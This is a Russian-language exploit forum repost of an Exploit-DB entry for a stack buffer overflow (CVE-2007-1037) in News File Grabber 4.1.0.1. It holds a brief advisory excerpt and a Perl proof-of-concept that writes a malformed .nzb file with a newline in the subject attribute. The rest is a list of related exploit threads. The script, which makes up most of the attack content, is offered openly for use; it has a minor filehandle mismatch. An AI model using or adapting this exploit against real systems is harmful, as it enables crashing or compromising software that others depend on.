Exploit News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29617
Проверка EDB
  1. Пройдено
Автор
PARVEEN VASHISHTHA
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-1037
Дата публикации
2007-02-19
News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)
Код: 
source: https://www.securityfocus.com/bid/22617/info

News File Grabber is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of the affected application.

This issue affects version 4.1.0.1; other versions may also be affected. 

#!/usr/bin/perl
# ===============================================================================================
#                News File Grabber Subject Line Stack Buffer Overflow perl exploit 
#                               By Parveen vashishtha ([email protected])
# ==============================================================================================          
# Reference : https://www.securityfocus.com/bid/22617
#
# 
#
# Buffer overflow exists in Subject parameter of the .nzb file
# By Passing a newline char it crashes
# So here you go.
# 
#================================================================================================

use strict;

my($file_header)="<?xml version=\"1.0\" encoding=\"iso-8859-1\" ?>\n".
			"<!DOCTYPE nzb PUBLIC \"-//newzBin//DTD NZB 1.0//EN\" \"http://www.newzbin.com/DTD/nzb/nzb-1.0.dtd\">\n".
			"<!-- NZB Generated by Parveen Vashishtha -->\n".
			"<nzb xmlns=\"http://www.google.com\">\n\n";

my($file_end)="</segment>\n".
"</segments>\n".
"</file>\n".
"</nzb>\n";


open(OUTPUTFILE, ">poc.nzb");                        # Crafted .NZB file 
 
print OUTPUTFILE $file_header;                       # Writing Header

print OUTPUTFILE "<file poster=\"Poster\" date=\"1170609233\"\nsubject=\"";    # Vulnerable SUBJECT parameter

print OUTPUTFILE "\\n";

print OUTPUTFILE "\">\n<groups><group>some group</group></groups>\n<segments>\n<segment bytes=\"30\" number=\"1\">some name";
print OUTPUTFILE $file_end;                                     # End of file


close(OUTFILE);
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)
Ответы
0
Просмотры
395
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2mail.php?b2inc' Remote File Inclusion
Ответы
0
Просмотры
467
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2categories.php?b2inc' Remote File Inclusion
Ответы
0
Просмотры
485
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit CafeLog B2 0.6.1 Weblog and News Publishing Tool - 'b2archives.php?b2inc' Remote File Inclusion
Ответы
0
Просмотры
457
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion
Ответы
0
Просмотры
445
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Magic News Plus 1.0.2 - 'preview.php?PHP_script_path' Remote File Inclusion
Ответы
0
Просмотры
435
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion
Ответы
0
Просмотры
409
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mini-CMS / News Script Light 1.0 - Remote File Inclusion
Ответы
0
Просмотры
435
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion
Ответы
0
Просмотры
377
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Web//News 1.4 - 'parser.php' Remote File Inclusion (2)
Ответы
0
Просмотры
350
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу